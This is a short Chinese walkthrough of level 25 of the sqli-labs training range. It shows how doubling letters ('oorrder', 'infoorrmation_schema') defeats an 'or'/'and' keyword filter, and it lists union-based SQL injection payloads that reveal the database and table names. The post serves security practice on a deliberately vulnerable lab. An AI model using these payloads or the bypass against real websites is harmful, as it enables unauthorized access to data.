sqli-labs靶场Less25

1.我们打开靶场看一下,发现这一关将我们之前用的or与and被过滤掉了

2.我们来尝试着来绕过一下,发现将and双写一下就可以绕过了

3.依次输入以下语句即可得到结果

复制代码
?id=1' oorrder by 2 --+
?id=-1'union select 1,database(),3 --+
?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema = 'security' --+   #其他命令和前面一样,注意将过滤的内容双写绕过
相关推荐
小马哥编程17 分钟前
【软考架构】第6章 数据库基本概念
数据库·oracle·架构
自学也学好编程18 分钟前
【数据库】PostgreSQL详解:企业级关系型数据库
数据库·postgresql
.Eyes2 小时前
OceanBase 分区裁剪(Partition Pruning)原理解读
数据库·oceanbase
MrZhangBaby2 小时前
SQL-leetcode— 2356. 每位教师所教授的科目种类的数量
数据库
一水鉴天3 小时前
整体设计 之定稿 “凝聚式中心点”原型 --整除:智能合约和DBMS的在表层挂接 能/所 依据的深层套接 之2
数据库·人工智能·智能合约
翔云1234563 小时前
Python 中 SQLAlchemy 和 MySQLdb 的关系
数据库·python·mysql
孙霸天3 小时前
Ubuntu20系统上离线安装MongoDB
数据库·mongodb·ubuntu·备份还原
Java 码农4 小时前
nodejs mongodb基础
数据库·mongodb·node.js
TDengine (老段)4 小时前
TDengine IDMP 运维指南(4. 使用 Docker 部署)
运维·数据库·物联网·docker·时序数据库·tdengine·涛思数据
TDengine (老段)4 小时前
TDengine IDMP 最佳实践
大数据·数据库·物联网·ai·时序数据库·tdengine·涛思数据